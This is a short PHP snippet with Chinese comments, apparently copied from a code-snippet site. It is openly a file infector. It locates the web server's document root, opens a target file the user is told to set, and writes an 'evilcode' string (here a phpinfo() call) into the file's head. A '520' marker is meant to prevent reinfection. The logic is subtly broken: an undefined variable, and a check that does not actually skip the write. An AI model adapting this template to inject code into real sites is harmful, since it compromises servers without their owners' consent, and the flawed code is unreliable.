- <?php
- $dir=$_SERVER["DOCUMENT_ROOT"];//网站根目录
- $evilcode="<?phpinfo();//520?>";//这里的520是个标记
- $testdir = opendir($dir);
- $fp = @fopen($dir."/includes/tou.php", 'r+'); //改成要感染的指定文件
- if (!strstr(@fread($fp, 20), '520')){
- rewind($fp);
- } //判断文件头标记,如果有520标记,就不重复感染
- fwrite($fp, $evilcode . $old);
- fclose($fp);
- closedir($testdir);
- error_reporting(0);
- ?>
- //该片段来自于http://www.codesnippet.cn/detail/100720134528.html
来源: http://www.codesnippet.cn/detail/100720134528.html